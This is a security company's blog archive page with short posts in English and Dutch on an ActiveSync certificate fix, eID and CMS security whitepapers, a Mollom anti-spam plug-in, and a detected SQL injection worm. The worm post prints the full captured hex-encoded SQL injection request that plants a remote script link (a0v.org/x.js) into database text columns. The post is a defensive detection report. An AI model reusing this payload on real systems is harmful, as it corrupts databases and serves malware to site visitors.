Hi all,
I moved my blog to http://www.zionsecurity.com/blog.aspx?show=Blog
My first blog post is about the unsecure implementation of the Belgian eID module in Drupal!
Hope to see you there,
Erwin
Monday, March 1, 2010
Tuesday, November 3, 2009
Windows Mobile & ActiveSync troubleshooting
in English because I didn't find a good solution online!
Problem: ActiveSync stopped working this weekend, and I received an error like "you don't have permissions in Exchange to sync" but that was BS. Nothing changed on my account.
We had a customer with the same problem a few weeks ago: the same no permissions error and ActiveSync stopped working. This had to do, I think, with the change of summer to winter time and an incorrect date/time setting on the Windows Mobile.
We all use client certificates, generated by our certificate authority and checking the properties of the certificate on my windows mobile showed that it was expired on Halloween! No error message indicating anything like it.
Copy and installing a new certificate on my Windows Mobile with private key didn't solve the problem immediately. I think ActiveSync still used the old certificate but deleting the old certificate and rebooting the device solved the ActiveSync problem!
I hope this is useful for some people because I was able to find the error message but not the solution!
Problem: ActiveSync stopped working this weekend, and I received an error like "you don't have permissions in Exchange to sync" but that was BS. Nothing changed on my account.
We had a customer with the same problem a few weeks ago: the same no permissions error and ActiveSync stopped working. This had to do, I think, with the change of summer to winter time and an incorrect date/time setting on the Windows Mobile.
We all use client certificates, generated by our certificate authority and checking the properties of the certificate on my windows mobile showed that it was expired on Halloween! No error message indicating anything like it.
Copy and installing a new certificate on my Windows Mobile with private key didn't solve the problem immediately. I think ActiveSync still used the old certificate but deleting the old certificate and rebooting the device solved the ActiveSync problem!
I hope this is useful for some people because I was able to find the error message but not the solution!
Monday, August 3, 2009
10 tips voor een veilige e-ID implementatie
Nieuwe whitepaper waarin we 10 tips meegeven voor een veilige implementatie van de Belgische elektronische identiteitskaart voor een web applicatie. Meer op http://www.zionsecurity.com/downloads/articles/whitepaper-10-tips-voor-een-veilige-eid-implementatie.aspx
Friday, July 31, 2009
Whitepaper ivm de selectie voor een veilige open-source CMS online
Onze whitepaper waarbij we Drupal, Joomla! en Typo3 vergelijken op basis van kwetsbaarheden, OWASP Top 10 en dergelijk is nu online te bekijken op onze nieuwe web site: http://www.zionsecurity.com/downloads/whitepapers/whitepaper-selecting-a-secure-open-source-content-management-system.aspx
Wednesday, July 29, 2009
SQL Injection worm is nog altijd alive, en nu ook voor ASP.NET
Onze web application firewall infrastructuur heeft een nieuwe variant gedetecteerd van de SQL Injection worm, die nu ook ASP.NET pagina's via Google aanvalt.
de payload:
POST /Page.aspx?id=RNI;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005 \
200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760 \
06100720063006800610072002800320035003500290020004400450043004C004100520045002000540061006 \
2006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730 \
065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006 \
F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C00750 \
06D006E00730020006200200077006800650072006500200061002E00690064003D0062002E006900640020006 \
1006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0 \
0780074007900700065003D003900390020006F007200200062002E00780074007900700065003D00330035002 \
0006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E007800740 \
07900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075007 \
20073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020002000540 \
0610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002 \
0005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300 \
02900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B002 \
7002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740 \
0720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002 \
B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0 \
068007400740070003A002F002F006100300076002E006F00720067002F0078002E006A0073003E003C002F007 \
300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460 \
052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002 \
000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0 \
043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C006 \
5005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.0
dit is ASCII HEX encoding. Burp Suite heeft hier geen problemen mee :)
Het enige verschil met de SQL injection worm van 2008 is de script payload met een link naar a0v.org/x.js (niet bezoeken!)
de payload:
POST /Page.aspx?id=RNI;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005 \
200450020004000540020007600610072006300680061007200280032003500350029002C00400043002000760 \
06100720063006800610072002800320035003500290020004400450043004C004100520045002000540061006 \
2006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730 \
065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006 \
F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C00750 \
06D006E00730020006200200077006800650072006500200061002E00690064003D0062002E006900640020006 \
1006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E0 \
0780074007900700065003D003900390020006F007200200062002E00780074007900700065003D00330035002 \
0006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E007800740 \
07900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F00430075007 \
20073006F00720020004600450054004300480020004E004500580054002000460052004F004D0020002000540 \
0610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C00400043002 \
0005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D00300 \
02900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B002 \
7002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D007200740 \
0720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002 \
B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0 \
068007400740070003A002F002F006100300076002E006F00720067002F0078002E006A0073003E003C002F007 \
300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460 \
052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002 \
000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0 \
043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C006 \
5005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);-- HTTP/1.0
dit is ASCII HEX encoding. Burp Suite heeft hier geen problemen mee :)
Het enige verschil met de SQL injection worm van 2008 is de script payload met een link naar a0v.org/x.js (niet bezoeken!)
Friday, July 24, 2009
Beta testers voor onze Mollom client gezocht
Voor wie Mollom niet kent: anti-spam oplossing voor web applicaties zodat er geen spam in berichten te recht komt. Wordt oa gebruikt door onze vrienden van Netlog.
Mollom heeft sinds het begin al 100 millioen berichten gestopt: http://mollom.com/blog/hundred-million-spam-attempts-blocked
ZION SECURITY heeft een plug-in voor IIS ontwikkeld waarbij we ASP en ASP.NEt sites kunnen integreren met Mollom, zonder dat er een lijn code aan de huidige applicatie moet worden gewijzigd.
interesse? contacteer ons op info@zionsecurity.com
BTW: Mollom heeft een gratis versie!
Mollom heeft sinds het begin al 100 millioen berichten gestopt: http://mollom.com/blog/hundred-million-spam-attempts-blocked
ZION SECURITY heeft een plug-in voor IIS ontwikkeld waarbij we ASP en ASP.NEt sites kunnen integreren met Mollom, zonder dat er een lijn code aan de huidige applicatie moet worden gewijzigd.
interesse? contacteer ons op info@zionsecurity.com
BTW: Mollom heeft een gratis versie!
Subscribe to:
Posts (Atom)